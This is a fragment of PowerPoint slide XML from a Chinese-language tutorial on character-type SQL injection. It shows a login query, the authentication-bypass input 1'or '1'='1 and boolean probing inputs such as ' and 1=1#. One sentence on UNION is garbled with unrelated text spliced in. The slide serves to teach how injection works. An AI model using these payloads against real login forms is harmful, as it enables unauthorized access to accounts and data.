          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438429" y="407896"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据。中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="5304026" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入分类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>字符型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E18CD03-08D8-45DC-BEE7-56F06037A00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389251" y="1476449"/>
            <a:ext cx="4178973" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代表语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>验证登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{888F102C-3A40-4FA4-B695-F464B70910CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260733" y="1966924"/>
            <a:ext cx="9670532" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>select * from user where username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>and password= '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCC6CE12-808E-4FF4-AA31-E3A9071A2E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438429" y="2668657"/>
            <a:ext cx="3256020" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>万能密码： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>1'or '1'='1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B134AE0B-9ABE-4BFF-BDA3-109808F7FDFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14691920"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7493570" y="3557530"/>
          <a:ext cx="4166695" cy="2315448"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="555505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217910847"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289602206"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2781414587"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2334648633"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Admin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527666147"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Bob</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>123</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="656364240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>user1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>pass1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2831422024"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C32CC8-0E56-422C-8512-34E95EDEA42C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9345066" y="5748429"/>
            <a:ext cx="1028578" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EE41A0-29F8-4BF3-9147-084309A5D356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389251" y="3159109"/>
            <a:ext cx="7269234" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>where username= '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>and password= '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1'or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B2A50B7-C8E1-43D2-97D0-2A5A4AB3F3A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438429" y="3712172"/>
            <a:ext cx="2563522" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>优先级： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>and&gt;or</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC73C98B-03D9-4581-AE6A-5F0EE7F14CB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572372" y="4821293"/>
            <a:ext cx="4857950" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>① 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= '                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD2C0AB-4A5E-4691-94DA-857D64E7777F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552799" y="5286764"/>
            <a:ext cx="6454670" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>② 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= ' and 1=1#     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>页面与①不同</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4B2BA0-43B1-4027-BD23-350EA51A9798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552799" y="5748429"/>
            <a:ext cx="6454670" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>③ 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= ' and 1=2#     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>页面与②不同</a:t>
            </a:r>
